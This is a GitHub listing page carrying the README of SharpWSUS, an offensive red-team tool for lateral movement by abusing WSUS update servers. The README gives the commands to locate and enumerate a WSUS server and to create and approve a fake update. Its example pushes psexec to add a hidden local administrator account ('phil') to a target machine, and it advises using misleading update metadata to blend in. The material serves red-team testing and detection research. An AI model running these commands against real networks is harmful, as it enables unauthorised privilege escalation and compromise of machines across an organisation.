https://github.com/nettitude/SharpWSUS

https://github.com/nettitude/SharpWSUS

Last synced: 3 months ago
JSON representation

• Host: GitHub
• URL: https://github.com/nettitude/SharpWSUS
• Owner: nettitude
• Created: 2022-05-04T08:27:57.000Z (over 2 years ago)
• Default Branch: main
• Last Pushed: 2022-11-20T23:41:40.000Z (almost 2 years ago)
• Last Synced: 2024-05-07T00:35:23.598Z (6 months ago)
• Language: C#
• Size: 17.6 KB
• Stars: 428
• Watchers: 8
• Forks: 72
• Open Issues: 3
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - nettitude/SharpWSUS - (C# #)

README

        
# SharpWSUS

SharpWSUS is a CSharp tool for lateral movement through WSUS. There is a corresponding blog (https://labs.nettitude.com/blog/introducing-sharpwsus/) which has more detailed information about the tooling, use case and detection.

## Credits 

Massive credit to the below resources that really did 90% of this for me. This tool is just an enhancement of the below for C2 reliability and flexibility.

* https://github.com/AlsidOfficial/WSUSpendu - powershell tool for abusing WSUS

* https://github.com/ThunderGunExpress/Thunder_Woosus - Csharp tool for abusing WSUS

## Help Menu

```

 ____  _                   __        ______  _   _ ____

/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|

\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \

 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |

|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/

                       |_|

           Phil Keeble @ Nettitude Red Team

Commands listed below have optional parameters in <>.

Locate the WSUS server:

    SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:

    SharpWSUS.exe inspect

Create an update (NOTE: The payload has to be a windows signed binary):

    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] 

Approve an update:

    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] 

Check status of an update:

    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete update and clean up groups added:

    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] 

```

## Example Usage

```

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

```

## Notes

* Binary has to be windows signed, so psexec, msiexec, msbuild etc could be useful for lateral movement.

* The metadata on the create command is not needed, but is useful for blending in to the environment.

* If testing in a lab the first is usually quick, then each subsequent update will take a couple hours (this is due to how windows evaluates whether an update is installed already or not)